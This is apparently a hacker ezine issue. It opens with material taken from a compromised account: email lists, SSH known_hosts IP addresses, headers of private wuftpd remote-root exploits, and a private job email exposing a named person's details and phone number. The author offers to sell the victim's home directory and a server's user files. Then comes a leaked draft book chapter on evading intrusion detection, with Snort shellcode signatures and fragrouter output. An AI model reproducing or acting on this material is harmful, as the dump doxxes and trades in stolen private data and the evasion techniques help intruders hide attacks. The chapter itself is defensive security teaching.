all@camisade.com To: shok@dataforce.net To: siphon@gravitino.net To: swezlex@yahoo.com To: team-radix@camisade.com To: xbud@g0thead.com To: To: To: To: To: To: To: To: To: To: i luv mail $ cat .ssh/known_hosts redondo.pic.ucla.edu,128.97.12.10 192.168.1.2 64.167.139.59 adsl-64-167-139-59.dsl.snfc21.pacbell.net undef.net,66.126.234.62 $ head wux86_glob.c /*## wux86_glob - x86/linux wuftpd <= 2.6.1 remote root exploit #*//*## written by bind jan 2002 USA #*/ /* THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE - DO NOT DISTRIBUTE *//* this is proof of concept software. in no event shall the author be *//* liable for any direct, indirect, incidental, special, exemplary or *//* consequential damages resulting from the use of misuse of this software. */ #include #include im going to kick bind's ass too $ head wuexploit/fuckwu.c /* * fuckwu - wuftpd <= 2.6.1 remote root exploit * written by bind & aempirei * 12-6-2001 * private source code. * do not distribute. */ #include #include msg me for source code $ ls misccode/ aetrojan.c fmt.c haq.c inliner.c p.c tsl_bind.c dnssniff.c fmtg.c identd.c nbtmap.c shit.c $ head naim.log *** Log opened 2002-01-02T10:38.
Ambient Empire -> Catastr0phik | what up
Catastr0phik -> Ambient Empire | purrrrrrrrrrrrrrrrr
Catastr0phik -> Ambient Empire | how exciting!

Catastr0phik -> Ambient Empire | To: Subject: RE: Resume etc. Date: Wed, 5 Dec 2001 17:40:30 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: <20011205171320.A29633@gravitino.net> Status: RO X-Status: A Content-Length: 1134 Lines: 45 Hello Christopher, Leona was right and silvio is also coming in the us office before the end of the year. After reading your resume, you fit exactly the profile we are loking for. So tell me when you will be in the bay aera to setup an interview in our office. If you have any question don't hesitate to mail me or to phone me. My phone number is (650) 801-6120 Thanks for your interest in our company. Oliv. > -----Original Message----- > From: aempirei@gravitino.net [mailto:aempirei@gravitino.net] > Sent: Wednesday, December 05, 2001 5:13 PM > To: oliv@qualys.com > Subject: Resume etc. > > > Hello, > > My name is christopher abad. I was told by > Leona, a friend of Silvio's that Qualys will > be opening a San francisco office and to > contact you in possible R&D Job opportunities. > I am currently employed by foundstone inc. > but am returning home to san francisco before > christmas and would be interested in exploring > any possible opportunities in san francisco. > attached is my resume in word format. i appeciate > the time you have taken to review my email. 
> > best regards, > christopher abad after alot of thinking i have decided to sell aempirei's homedir, and the gravitino box tars at defcon if you get a hold of me, i will be selling aempirei's homedir for $15, and gravitino box (all users) for $30 i'll have them burned to cd's oh and shouts to mrmittens, and vmy/hi for hacking aempirei and to ~el8 for letting me put this in the ezine [CUT_HERE] ch16 .~e~----------------------------------------------------------~e~. ; *15* chapter sixteen -- ktwo ; `----------------------------------------------------------------' y0y0y0y0y0y0, hey ladies and gents, I just thought maybe I would take a risk and include chapter 16 of Hack Proofing Your Network before the book is released. This is the unedited version, fresh off the printing press. Have fun, and remember, I will be autogr- aphing copies of Know Your Enemy for free at this upcoming defcon. Chapter 16: Ryan, suggest places for inclusion of code and screenshots, as requested. Id like to see some screenshots, packet prints, command-line options or something for the fragrouter section. Grammar and style was a bit awkward and punctuation was sparse. I did one pass-through (didn't track the easy edits, so it wouldn't be too hard on the eyes), please highlight anything you feel is still awkward and needs to be clarified by the author. I like the material a lot. Just need to fix wording in a few spots, as mentioned. Chapter 16 IDS Evasion Solutions in this chapter: Understanding How Signature-Based IDSs Work Using Packet Level Evasion Using Protocol and Application Protocol Level Evasion Using Code Morphing Evasion Chapter suggestions for: Examples and Exercises: Check for the specific code called for in each section Screen Shots: Screenshots for each program called for Introduction One of the laws of security is that all signature-based detection mechanisms can be bypassed. This is as true for Intrusion Detection System (IDS) signatures as it is for virus signatures. 
IDS systems, which have all the problems of a virus scanner, plus the job of modeling network state, must operate at several layers simultaneously, and they can be fooled at each of those layers. IDSs have all the problems of a virus scanner, plus the job of modeling network state. This chapter covers techniques for evading IDSs. These techniques include playing games at the packet level, application level, and morphing the machine code. Each of these types can be used individually, or together, to evade detection by an IDS. In this chapter, we present several examples of how an attack might evade detection. Understanding How Signature-Based IDSs Work An IDS is quite simply the high-tech equivalent of a burglar alarm—a burglar alarm configured to monitor access points, hostile activities and known intruders. These systems typically trigger on events by referencing network activity against an attack signature database. If a match is made, an alert will take place and will be logged for future reference. It is the makeup of this signature database that is the Achilles heel of these systems. Attack signatures consist of several components used to uniquely describe an attack. An ideal signature would be one that is specific to the attack while being as simple as possible to match with the input data stream (large complex signatures may pose a serious processing burden). Just as there are varying types of attacks, there must be varying types of signatures. Some signatures will define the characteristics of a single IP option, perhaps that of a nmap portscan, while others will be derived from the actual payload of an attack. Most signatures are constructed by running a known exploit several times, monitoring the data as it appears on the network and looking for a unique pattern that is repeated on every execution. This method works fairly well at ensuring that the signature will consistently match an attempt by that particular exploit — but only that exploit: a different tool aimed at the same vulnerability, or a trivially modified payload, need not produce the same pattern on the wire.
Although I have seen my share of shoddy signatures, some so simplistic in nature that the amazingly hostile activity of browsing a few Websites may set them off, remember the idea is for the unique identification of an attack, not merely the detection of attacks. Tools & Traps: Signature Components The following are example Snort signatures: Breaks and indents for wrapping lines OK? Looks good to me. alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 (msg:"SCAN Proxy attempt";flags:S; classtype:attempted-recon; sid:620; rev:1;) alert ip $EXTERNAL_NET any -> $HOME_NET :1023 (msg:"SHELLCODE linux shellcode"; content:"|90 90 90 e8 c0 ff ff ff|/bin /sh"; classtype:attempted-admin; sid:652; rev:2;) alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"FTP CWD ..."; flags:A+; content:"CWD ..."; classtype:bad-unknown; sid:1229 ; rev:1;) alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"ICMP traceroute ipopts"; ipopts: rr; itype: 0; classtype: attempted-recon; sid:475; rev:1;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB- ATTACKS chgrp command attempt"; flags:A+; content:"/usr/bin/ chgrp";nocase; sid:1337; rev:1; classtype:web-application -attack;) Here are some basics of Snort signatures. Snort implements a description language used to construct any rule. To avoid getting into the rather complex details of writing your own signatures, let’s simply go left to right through the examples above and try to discern what exactly they mean. We can see that these all define a type of alert. These alerts are then classified into a type of protocol, then the specific details are given: IP address ($EXTERNAL_NET and $HOME_NET are variables usually defined as 10.10.10.0/24 CIDR style) and port numbers to restrict the scope.
The msg keyword defines the message that will be sent out if the rule is matched; flags will define which of the TCP flags are set in the stream, just as ipopts dictates the options of an IP packet; and content is used to specify a unique series of data that appears in the actual contents of the packet. In a content field, anything between vertical bars is in hex format, while the rest is ASCII. The first rule watches for any attempt from the outside to connect to an inside host at TCP port 8080, which is a port often used for web proxies. The second rule looks for a commonly-used shellcode sequence inside any IP packet going to a port less than 1024. (The :1023 is shorthand for a range of ports between 0 and 1023, inclusive.) The third rule is checking for a “CWD …” command to TCP port 21, the FTP port. The fourth rule is watching for IP packets with the rr (Record Route) option on. The final rule is checking for the string “/usr/bin/chgrp” going to port 80, the HTTP port. Computing systems, in their most basic abstraction, can be defined as a finite state machine, which literally means that there are only a specific predefined number of states that a system may attain. This limitation hinders the IDS in that it can only be well armed at a single point in time (i.e. only as well armed as the size of its database). First, how can one have foreknowledge of the internal characteristics that make up an intrusion attempt that has not yet occurred? You can’t alert on attacks you’ve never seen before. Second, there can be only educated guesses that what has happened in the past may again transpire in the future. You can create a signature for a past attack after the fact, but that’s no guarantee you’ll ever see that attack again. Third, an IDS may be incapable of discerning a new attack from the background white noise of any network.
The network utilization may be too high, or many false positives may cause rules to be disabled. And finally, it may be incapacitated by even the slightest modification to a known attack. It is either a weakness in the signature matching process or, more fundamentally, a weakness in the packet analysis engine (packet sniffing/reconstruction) that will thwart any detection capability. You’re getting too abstract for me to follow here. I don’t follow where you’re going with the state-machine discussion. Are you trying to point out that the external IDS has to model the state of the victim? I think what you’re saying is that 1) You can’t alert on attacks you’ve never seen before, 2) You can create a signature for a past attack after the fact, but that’s no guarantee you’ll ever see that attack again? Is 3) relating to anomaly detection? Point 4 is understandable as-is. How about we embed a few of these statements for clarity. The state discussion was just to get the reader accustomed to the idea of state and modeling? The goals of an attacker as it relates to IDS evasion are twofold: to evade detection completely, or to use techniques and methods that will increase the processing load of the IDS sensor significantly. The more methods employed by attackers at large, on a wide scale, the more vendors will be forced to implement more complex signature matching and packet analysis engines. These complex systems will undoubtedly have lower operating throughputs and more opportunities for evasion. The paradox is that the more complex a system becomes, the more opportunities there are for vulnerabilities! Some say the ratio for bugs to code may be as high as 1:1000, and even conservatives say a ratio of 1:10000 may exist. With these sorts of figures in mind, a system of increasing complexity will undoubtedly lead to new levels of increased insecurity. Judging False Positives and Negatives To be an effective tool, an IDS must be able to digest and report information efficiently.
A false positive is an alert that fires on activity that was not actually an attack, which may be as innocuous as the download of a signature database (downloading of an IDS signature database may trigger every alarm in the book) or some unusual traffic generated by a networked game. This, although annoying, is usually not of much consequence but can easily happen and is usually tuned down by an initial configuration and burn-in of a Network IDS (NIDS) configuration. However, more dangerous is the possibility for false negatives, which is the failure to alert to an actual event. This would occur in a failure of one of the key functional units of a NIDS. False negatives are typically the product of a situation in which an attacker modifies their attack payload in order to subvert the detection engine. False positives have a significant impact on the effectiveness of an IDS sensor. If you are charged with the responsibility of monitoring a device, you will find you become accustomed to its typical behavior. If there is a reasonable number of false positives being detected, the perceived urgency of an alert may be diminished by the fact that there are numerous events being triggered on a daily basis that turn into wild goose chases. In the end, all the power of IDS is ultimately controlled by the single judgment call on whether or not to take action. Alert Flooding This problem of making sense of what an IDS reports is apparent again in a flood scenario. Flooding, as you may have guessed, is the process of overloading the IDS by triggering a deluge of alerts. This attack has a number of beneficial actions for an attacker. If the attacker can muster enough firepower in terms of network bandwidth, a Denial of Service (DoS) attack is possible. Many IDS sensors exacerbate this condition by the first match (or multiple match) paradox, in which the sensor has to essentially decide whether or not to alert based on the first match in its database or to attempt further matches.
The issue here is that an attacker may identify a low-priority or benign signature common to many IDS signature databases and attempt to reproduce this in a more damaging exploit attempt. If the sensor were to use a first match method, it would produce an alert for the less severe vulnerability and not signal to the true nature of the attack. However, in using the multiple match approach, the IDS allows itself to be more vulnerable to alert flooding attacks. The attacker may simply package an entire signature database into some network traffic and watch the IDS crumble to the ground. Aside from the desirable condition of failing an IDS sensor, there is the added bonus of having generated an excessive amount of alerts (in excess of 10,000 is no problem at all) that the admin must then somehow make sense of. The intended target host may be totally lost within a dizzying display of messages, beeps and red flags. Trying to identify a real intrusion event may be arduous at best. Let us not forget the psychological impact of seeing what may be construed as an all-out Internet wide assault on your networking equipment. If this style of attack were to somehow become routine, how effective would your IDS solution be then? Using Packet Level Evasion Are you going to cover Hailstorm here as indicated in the original outline. Not in this portion of text ?but somewhere within this Level One Head Section? I spoke with Ryan about using fragrouter and such in place of Hailstorm. Clicktosecure.com is down and I am unable to get much information about it at this time. Yes, that is correct. Network IDSs have the dubious task of making sense of literally millions of pieces of information per second, analyzing information while providing acceptable response times (typically as close to real-time as possible is desired). To break down the effort of data analysis, a NIDS will function on several discrete layers of the network protocol stack. 
The first layers under inspection will be the network and transport layers, where the attacker has a great opportunity to confuse, circumvent or eliminate a NIDS sensor. If an attacker were to devise a technique that would enable them to evade detection this would be an ideal location to begin, as all other detection capabilities of the IDS rely on the ability to correctly interpret network traffic just as the target host would. Unfortunately for the defender the characteristics of IP and TCP do not lend themselves to well-defined inspection. These protocols were developed to operate in a dynamic environment, defined by permissive standards that are laden with soft “SHOULD” and “MAY” statements, “MUST” being reserved for only the most basic requirements. This lax definition of protocol standards leads to many complications when an attempt is made to interpret network communications. This will leave the door open for an attacker to desynchronize the state of the IDS, such that it does not correctly assemble traffic in the same manner that the target host will. For example, if an IDS signature was crafted to search for the string “CODE-RED” in any HTTP request, it may be possible for the attacker to fragment his traffic in such a way that it will assemble differently for the IDS than it will for the target host. Therefore, the attacker may exploit the target host without the IDS being able to interpret the event accordingly. Notes from the Underground: TCP/IP Specification Interpretation The difficulties inherent in interpreting the TCP/IP specification are also what lead to many TCP/IP stack fingerprinting opportunities. Anything from the initial TCP sequence number to packet fragment and options handling characteristics may be used to identify a remote OS. This uniqueness of implementation (nmap has over 300 entries in its nmap-os-fingerprints database) has produced some of the most devastating and complex problems for IDS developers to overcome.
The challenge of decoding what a particular stream of communications may look like to the end host, without intimate knowledge of the inner workings of its protocol stack, is exceedingly complex; the flip side is that a sensor which is told what stack each monitored host runs can at least choose the matching reassembly behavior instead of guessing. Author: Rephrase for clear grammar in last sidebar sentence. Several years ago a paper was written to discuss the many issues facing NIDS development. Essentially the attacks discussed in Thomas Ptacek and Timothy Newsham’s 1998 paper "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection" () vary in style from insertion to evasion attacks. Insertion and evasion are the basis for evading a signature match. Insertion is the technique which relies upon a situation where an IDS will accept some information with the assumption that the target host will also. However, if the IDS does not interpret the network stream in the same manner that the target does, the IDS will have a different understanding of what the communication looks like and will be ineffective in properly alerting to the presence of an attack. The IDS signature will simply not match the data acquired from the network. Our “CODE-RED” example may be seen by the IDS as “CODE-NOT-RED”, which may be enough for the IDS to feel safe, whereas the target host will actually receive “CODE-RED”, having dropped the “NOT” in the middle due to the packet containing it not matching the target’s understanding of the standards. Evasion is the converse of insertion; it relies upon a situation in which a target system will accept data that the IDS will ignore. An attack may then look something like “CODE” to the IDS where the target will receive “CODE-RED”. These sorts of attacks can be enabled in a number of ways. At any time a TCP/IP communication may be terminated by either party. If the IDS were to incorrectly interpret a RST or FIN from an attacker that was not accepted by the target host (e.g.
if the IDS did not correctly monitor sequence numbers), the attacker would be free to communicate with impunity. Denial of Service in IDS implementations is commonplace. The opportunities to subvert the operation of a sensor are quite apparent. System resources are finite; there are only so many pages of memory that can be allocated; CPUs are bound and even network IO cards may not be able to maintain consistent throughput despite their speed rating. Because a computer is a system of queues, some will inevitably fill and spill faster than the data contained may be examined. These issues vary from the micro scale when we are concerned with exhausting the relatively few network IO buffers, to macro issues similar to running low on disk resources. Management of system resources is a complex task that is made exceedingly difficult by requirements to monitor an unknown amount of communication streams and a limited view of the actual internal TCP/IP stack state for each host. IP Options Upon examination of an IP header, there are a number of fields in which, with methodical alteration, some insertion or evasion vulnerabilities will become apparent. Mangling the IP header must be done with care; our traffic must still be valid such that it can be routed across the Internet. Modifying the size of a packet may make it difficult for the IDS to understand where the upper layers of the packet begin (evasion). The IP checksum is another good start; if we can interleave invalid IP packets in our stream, the IDS may accept them as valid (if it does not calculate the checksum for every packet itself) where the end system does not (insertion). The defensive corollary is that a sensor must verify IP and TCP checksums and discard failures exactly as the end host will, rather than skip the check to save processing time. Time To Live Attacks In a typical network configuration, a NIDS would most often be placed on the perimeter of a network. This would enable the NIDS to monitor all communication across the Internet.
Unfortunately if an attacker is able to traceroute or methodically reduce the Time to Live (TTL) of the traffic to the target and identify the exact number of hops required to reach the host, they would then be able to send some packets with an insufficient TTL value. This would have the effect of ensuring the packets with a lower TTL would never reach the target system, but would instead be processed by the IDS as part of the stream, as seen in Figure 16.1. Luckily administrators may be able to combat this attack by configuring their IDS on the same network segment as the hosts they wish to monitor; a sensor that knows the hop count from itself to each monitored host can likewise discard any packet whose TTL is too small to get there. Figure 16.1 TTL Insertion Attack IP Fragmentation IP fragmentation reassembly is the basis for a number of attacks. If a NIDS sensor does not reassemble IP fragments in the same fashion as the target host, it will not be able to match the packet to its signature database. In normal network operations, IP fragments will typically arrive in the order in which they are sent. However, this is not always the case; IP supports difficult-to-analyze out-of-order transmission and overlapping fragment reassembly behaviors. Assembling IP fragments can also become complicated by the requirement to keep fragments in memory until the final fragment is received, in order to complete the assembly of the entire packet. This raises yet another DoS issue; many fragments can be transmitted to consume any internal buffers or structures so that the IDS may begin to drop packets or even crash. We can further elaborate on this issue when we add the complexity of internal garbage collection. An IDS listening to the wire may have to account for the sessions of several thousand hosts, whereas each host need only be concerned with its own traffic. A host system may allow an excessive amount of time for fragments to arrive in the stream whereas the IDS may have more aggressive timeouts in order to support the management of an exponentially larger system.
If the attacker were to send an attack consisting of three fragments and withhold the final fragment until a significant amount of time has expired, and if the NIDS does not have identical internal fragment management processes (something tells me this is next to impossible to attain), it will not have a consistent view of the IP packet and will therefore be incapacitated from any signature matching processes. Fragmentation Tests A number of tests conducted by Ptacek and Newsham revealed that at the time of testing none of the IDS platforms that were analyzed could properly interpret a number of IP fragmentation issues. The first two tests covered involved an in-order fragmented payload that was sent in two different sizes (8 and 24 bytes). Further testing was done where 8-byte fragments were sent—with one fragment sent out of order (evasion), with a fragment sent twice (insertion), with all fragments out of order and one duplicate (combination), by sending the fragment marked as the last fragment first (evasion), and by sending a series of fragments that would overlap the previous (evasion). Startling as it may seem, none of the four products (RealSecure, NetRanger, SessionWall and NFR) were able to handle any of the fragmentation attacks. Currently most NIDS have updated their fragmentation assembly engines such that they are capable of reconstructing streams with some degree of success. TCP Header The TCP header contains a number of fields that are open to exploitation, and so opportunities for evasion and insertion exist if an IDS were not to fully inspect the TCP header. The CODE field (the TCP flag bits) defines the type of message being sent for the connection; if someone were to send an invalid flag combination or a packet missing the ACK flag it would be possible that the target host would reject the packet where the IDS would not (insertion possible).
Segments marked as a SYN may also include data; due to the relatively infrequent use of this option for data, an IDS may ignore the contents of these segments as well (evasion). We can examine many of the fields in the TCP header and look for any opportunity where a target host will either accept traffic that the IDS does not or vice-versa. Another great example is the “Checksum” field: if the IDS were not calculating the checksum for every TCP segment itself, we may intermix segments with an invalid checksum into our legitimate session with the hope that the IDS will not validate all segments (the vendor may have assumed the processing overhead too great). RFC 1323, “TCP Extensions for High Performance,” by V. Jacobson, R. Braden and D. Borman, introduced (amongst other things) Protection Against Wrapped Sequence numbers (PAWS) and the possibility of non-SYN packets carrying new TCP options. This means that if an IDS does not know how a target system may deal with non-SYN packets containing options, there are multiple opportunities for insertion and evasion. The target system may reject this newer form of TCP where the IDS will not, and again the converse is also true. PAWS is a mechanism where each TCP segment carries a timestamp option; if the target host receives a segment whose timestamp is older than the last one it accepted on that connection, the segment is silently dropped, so an IDS that does not track timestamps will accept data the host has discarded (insertion). Again and again we see the difficulty with examining TCP data on the wire. There is simply not enough state information transmitted to give an accurate picture of what the behavior will be of a potential target host. I’d love to see a reference to the RFC that covers PAWS here. TCP Synchronization Just as there are a number of attack vectors available against strictly IP communications, when we begin to analyze layers above IP, the added complexity and requirements for functionality produce new synchronization challenges.
Today most IDS platforms have implemented “stateful” inspection for TCP. Stateful inspection requires a number of design decisions about how to identify a communication stream when you examine TCP data. An IDS must be capable of reconstructing a stream in an identical manner as the destination host—if it cannot, there will be opportunities for an attacker to subvert the analysis engine. The state information for a TCP session is held in a structure known as a TCP Control Block (TCB). A TCB (containing information like source and destination, sequence numbers and current state) will be required for each session that a NIDS will monitor. The three attack vectors that Ptacek and Newsham identified are as follows: TCB creation, stream reassembly, and TCB teardown. An IDS would have to participate in these processes to identify new sessions, monitor open connections, and to identify when it is appropriate to stop monitoring. TCB Creation Understanding how to begin monitoring a connection poses some interesting challenges. Should the NIDS simply monitor the TCP handshake processes and build a TCB at this time? Can the NIDS effectively establish a TCB for a connection for which it did not see a SYN (connections that were active before the monitor)? There are unique challenges with any technique used to establish a TCB. It would be desirable for the IDS to be able to monitor connections for which it did not see an initial Three Way Handshake (3WH). If not, an attacker could establish a connection and wait a significant amount of time; the IDS may reboot and then be unable to track the already established connection. It is possible to only use ACK packets for TCB creation. This is known as “synching on data”, and it has the added benefit of being able to identify sessions for which a 3WH has not been inspected.
There are a number of drawbacks, one being that the IDS will likely inspect excessive amounts of data as it will not be able to differentiate packets not part of a stream from established connections. Another issue is that syncing on data causes a dependence on accurate sequence number checking. The attacker may be able to desynchronize the IDS by spoofing erroneous data before attempting the attack. An alternate technique to TCB creation is to require a SYN+ACK combination to be seen. This has the added benefit that it is nearly impossible for the attacker to forge the ACK from the target network, and it enables the IDS to identify which host is the server and which the client. However, the IDS may be tricked into tracking many connections for non-existent hosts (DoS). A SYN+ACK can be easily spoofed without requiring the final ACK from the originating host and care should be taken when relying on this mechanism for TCB creation. A combination of methods is usually the best strategy, building on the strengths while attempting to eliminate the weaknesses of each technique. Stream Reassembly A number of similar issues exist for TCP stream reassembly as for IP fragmentation assembly. The TCP segments may arrive out of order, overlap and possibly be redundant. The IDS must take special care to monitor the sequence numbers of each connection to ensure they do not get desynchronized (difficult to do in a heavily loaded environment). Again, the difficulty with interpreting the possible behavior of the destination host, while not knowing the particulars about its TCP/IP stack implementation, is quite challenging. In the case of a redundant TCP segment, some hosts may retain the older frame, while others may discard it in favor of the most recently received.
If an IDS hopes to maintain a consistent view of the traffic being evaluated, it must also be wary of the advertised window size for each connection; this value is often tuned during a session to ensure maximum throughput. If an IDS were to lose sight of the size of the TCP window, it may be vulnerable to an easy insertion attack where the attacker simply sends in excess of the window size, in which case the destination host will simply drop packets that were received outside of its advertised size. TCB Teardown To ensure that a DoS condition does not occur, proper garbage collection must take place. There are some challenges here. Connections may terminate at any time, with or without notice. Some systems may not require RST segments to be properly sequenced. The Internet Control Message Protocol (ICMP) may even terminate a connection; most hosts will respect an ICMP destination unreachable message as an appropriate signal for termination. If the IDS is not aware of these semantics it may become desynchronized and unable to track new connections with similar parameters. There will almost undoubtedly be some timeout for any established connection to prevent some logic error from eventually leaking memory. This will also lead to an attack that we had alluded to earlier. Most hosts do not employ keep-alive messages for all connections. This leaves an IDS in an undesirable position where an attacker may simply wait for an excessive amount of time and possibly simultaneously provoke the IDS to become more aggressive with its garbage collection (by establishing many new connections). If successful, the attacker will be able to send whatever attacks they wish, undetected. Using Fragrouter and Congestant Theory is not enough for some to make a judgment on the performance of security products. We have seen time and time again that many vendors do not heed the warning of the research community.
To adequately illustrate the vulnerabilities that NIDS face, Dug Song released fragrouter in September 1999 (). Fragrouter's benefit is that it will enable an attacker to use the same tools and exploits they have always used without modification. Fragrouter functions, as its name suggests, as a sort of fragmenting router. It implements most of the attacks described in the Ptacek and Newsham paper. Congestant is another great tool that implements a number of anti-IDS packet mangling techniques. This was authored by "horizon" and was first released in December 1998 in his paper, “Defeating Sniffers and Intrusion Detection Systems” (www.phrack.org/show.php?p=54&a=10) for phrack 54. The difference here is that Congestant is implemented as a shared library or a kernel patch to OpenBSD. You may find that it is possible to use these tools concurrently for some added confusion for the IDS sensor. Increasing the processing overhead and complexity of IDS sensors is of benefit to an attacker; these systems become more prone to DoS and less likely to perform in an environment of extreme stress (large number of packets per second). It is a certainty that there will always be more features and options added to IDSs as they mature, as an attacker will always attempt to identify the critical execution path (the most CPU intensive operation an IDS may make) in attempts to stress an IDS sensor. I’d love to see some detail here. These programs are designed to be pretty transparent. Any chance you could print a before-and-after packet going through fragrouter? Here is the output when running fragrouter from a shell, it’s pretty plug-and-play, you just need to ensure that your system will route through the “fragrouter” host to reach the target.
storm:~/dl/fragrouter-1.6# ./fragrouter -F5 fragrouter: frag-5: out of order 8-byte fragments, one duplicate truncated-tcp 8 (frag 21150:8@0+) 10.10.42.9 > 10.10.42.3: (frag 21150:8@16+) 10.10.42.9 > 10.10.42.3: (frag 21150:8@8+) 10.10.42.9 > 10.10.42.3: (frag 21150:8@16+) 10.10.42.9 > 10.10.42.3: (frag 21150:4@24) truncated-tcp 8 (frag 57499:8@0+) 10.10.42.9 > 10.10.42.3: (frag 57499:8@8+) 10.10.42.9 > 10.10.42.3: (frag 57499:8@8+) 10.10.42.9 > 10.10.42.3: (frag 57499:4@16) truncated-tcp 8 (frag 57500:8@0+) 10.10.42.9 > 10.10.42.3: (frag 57500:8@8+) 10.10.42.9 > 10.10.42.3: (frag 57500:8@8+) 10.10.42.9 > 10.10.42.3: (frag 57500:4@16) truncated-tcp 8 (frag 58289:8@0+) 10.10.42.9 > 10.10.42.3: (frag 58289:8@8+) 10.10.42.9 > 10.10.42.3: (frag 58289:8@8+) 10.10.42.9 > 10.10.42.3: (frag 58289:4@16) Here is a comparison of how the tcpdump output from the F5 “fragrouter: frag-5: out of order 8-byte fragments, one duplicate” technique would appear compared with normal traffic. Note the DF (Don’t Fragment) flags on every packet of a normal connection and that the fragrouter stream has several fragmented packets. Before (no fragrouter): 19:36:52.469751 10.10.42.9.32920 > 10.10.42.3.7: S 1180574360:1180574360(0) win 24820 (DF) 19:36:52.469815 10.10.42.9.32920 > 10.10.42.3.7: S 1180574360:1180574360(0) win 24820 (DF) 19:36:52.470822 10.10.42.9.32920 > 10.10.42.3.7: . ack 4206722337 win 24820 (DF) 19:36:52.470841 10.10.42.9.32920 > 10.10.42.3.7: . ack 1 win 24820 (DF) 19:36:53.165813 10.10.42.9.32920 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF) 19:36:53.165884 10.10.42.9.32920 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF) 19:36:53.171968 10.10.42.9.32920 > 10.10.42.3.7: . ack 2 win 24820 (DF) 19:36:53.171984 10.10.42.9.32920 > 10.10.42.3.7: .
ack 2 win 24820 (DF) After (with fragrouter): 19:37:29.528452 10.10.42.9.32921 > 10.10.42.3.7: S 1189855959:1189855959(0) win 24820 (DF) 19:37:29.528527 10.10.42.9.32921 > 10.10.42.3.7: S 1189855959:1189855959(0) win 24820 (DF) 19:37:29.529167 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 21150:8@0+) 19:37:29.529532 10.10.42.9.32921 > 10.10.42.3.7: . ack 4211652507 win 24820 (DF) 19:37:29.529564 10.10.42.9.32921 > 10.10.42.3.7: . ack 1 win 24820 (DF) 19:37:29.530293 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 57499:8@0+) 19:37:30.309450 10.10.42.9.32921 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF) 19:37:30.309530 10.10.42.9.32921 > 10.10.42.3.7: F 0:0(0) ack 1 win 24820 (DF) 19:37:30.310082 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 57500:8@0+) 19:37:30.316337 10.10.42.9.32921 > 10.10.42.3.7: . ack 2 win 24820 (DF) 19:37:30.316357 10.10.42.9.32921 > 10.10.42.3.7: . ack 2 win 24820 (DF) 19:37:30.316695 10.10.42.9.32921 > 10.10.42.3.7: [|tcp] (frag 58289:8@0+) Countermeasures For those wishing to implement NIDS throughout their network infrastructure, fortunately there are some emerging technologies that help eliminate a great many of these lower-layer protocol vulnerabilities. Protocol normalization, as discussed by Mark Handley and Vern Paxson in May 2001 in “Network Intrusion Detection: Evasion, Traffic Normalization, and End-to-End Protocol Semantics” (), is an attempt to scrub or rewrite network traffic as it enters a destination network. This scrubbing process should eliminate many of the difficulties in reconstructing a consistent view of network traffic. If an IDS and target host were both behind a network protocol scrubber, they would both receive an identical picture of the network traffic. Tools & Traps… Honeynets Recently there has been an upsurge in the use of honeynets as a defensive tool. A honeynet is a system that is deployed with the intended purpose of being compromised.
These are hyper defensive tools that can be implemented at any location inside a network. The current best known configuration type for these tools is where two systems are deployed, one for the bait, the other configured to log all traffic. The logging host should be configured as a bridge (invisible to any remote attacker) with sufficient disk space to record all network traffic for later analysis. The system behind the logging host can be configured in any fashion. Most systems are quite simply bait, meaning that they are designed to be the most attractive target on a network segment. It is the hope of the defender that all attackers would see this easy point of presence and target their attacks in that direction. Although it has been seen that there is cause to have bait systems configured identically to other production systems on the target network (hopefully hardened), so that if an attacker's presence is detected on the honeynet (nobody can transmit any data to this system without detection), the defender can be sure that there are vulnerabilities in their production configuration. And with the added benefit of detailed logging, some low level forensics will typically reveal the vulnerability information along with any backdoors the intruder used to maintain their foothold. However, no system is foolproof. Attackers should be able to discern that they are behind a bridge by the lack of layer 2 traffic and the discrepancy in Media Access Control (MAC) addresses in the bait system's ARP cache. See http://project.honeynet.org for more details. Using Application Protocol Level Evasion IDS sensors have the ability to inspect the protocol internals of a communications stream to aid in the detection process. There are two basic strategies that vendors employ: application protocol decoding, where the IDS will attempt to parse the network input to determine the legitimacy of the service request, and simple signature matching.
Both of these approaches have their own unique challenges and benefits; we will see that most IDSs probably implement a hybrid of these solutions. Opportunities to evade detection are available at every layer of the protocol stack. Security as an Afterthought Application developers are typically motivated by features and dollars. We all know that the end user is the ultimate decision maker on the success or failure of software. In an effort to please end users, provide maximum compatibility, and eliminate erroneous conditions, developers omit strict compliance with protocol specifications in favor of error correction. It is uncommon for an application to immediately terminate requests upon the first deviation from specified protocols—quite to the contrary, every effort is made to recover from any error in an attempt to service every request possible (thereby maximizing compatibility and possibly increasing interoperability). As security researcher Rain Forest Puppy (known as RFP) stated at the CanSecWest Security Conference 2001, “You would be surprised with what passes for legitimate http traffic…” — RFP (CanSecWest Security Conference 2001). These practices are the downfall of application security; they only serve to aid an attacker in allowing additional latitude in which to operate. That section could be read as either favoring strict compliance, or the opposite. Please re-word to make less ambiguous. Perhaps “developers forego strict compliance…” Also, RFP has a couple of chapters before this one, so you can assume the reader has heard of him by the time they get here. Evading a Match Upgrades, patches and variation of implementation may change the appearance (on the wire) of an application. Signatures—too specific, too general and just plain too stale—are a basic issue that continues to thwart IDS attack identification efforts.
